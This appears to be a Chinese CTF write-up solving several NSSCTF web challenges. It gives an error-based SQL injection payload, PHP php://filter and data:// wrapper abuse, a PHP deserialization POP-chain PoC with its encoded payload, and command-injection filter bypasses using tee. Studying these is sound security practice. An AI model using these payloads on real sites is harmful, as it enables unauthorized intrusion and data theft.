error
双引号没有提示的注入,,那就是报错注入了,肯定是个恶心的东西呜呜呜
?id=1' and updatexml(1,concat(0x7e,(select right(flag,30) from test_tb),0x7e),1)--+
就这么爆叭太麻烦了呜呜
PseudoProtocols
直接让找hint.php直接访问不能够直接显示出源代码
emmm看题目名字应该是考察伪协议,那就直接伪协议读取hint.php
/index.php?wllm=php://filter/convert.base64-encode/resource=hint.php
解码
这里就自然想到了php伪协议data写入
/test2222222222222.php?a=data://text/plain,I want flag
NSSCTF{05167c8e-75fc-4e61-9d7d-5a5308e5ae7d}
pop
就是一个链子
<?php
error_reporting(0);
show_source("index.php");
class w44m{
private $admin = 'aaa';
protected $passwd = '123456';
public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php');
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m;
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?>
分析一下,程序首先会调用__destruct()方法,然后echo会调用到__toString(),这里如果将w00m为w44m,w22m为Getflag,这是就会调用到Getflag
需要注意的是要把上面的123换成08067
poc
<?php
class w44m{
private $admin = 'w44m';
protected $passwd = '08067';
public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php');
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m;
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}
$a=new w44m();
$b=new w22m();
$c=new w33m();
$b->w00m=$c;
$c->w00m=$a;
$c->w22m="Getflag";
echo urlencode(serialize($b));
payload
O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
NSSCTF{5357c0e5-2282-4992-8b6d-2261ac6a645b}
finalrce
啊这
exec是没有回显的,所以想办法回显,我试了好多次反弹shell,但是无济于事hhhban了nc(没看到
然后好像是可以写进文件里面然后访问文件,利用tee
payload1:
/?url=l\s /|tee 1.txt
然后访问1.txt
读取flag!
payload2:
/?url=tac /flllll\aaaaaaggggggg|tee 2.txt
NSSCTF{2a5d2df8-8b5f-476c-b83a-4b4c165666bc}
hardrce_3
用的是网上巴拉的自增payload
https://blog.csdn.net/miuzzx/article/details/109143413
不懂为啥,以后进行补充学习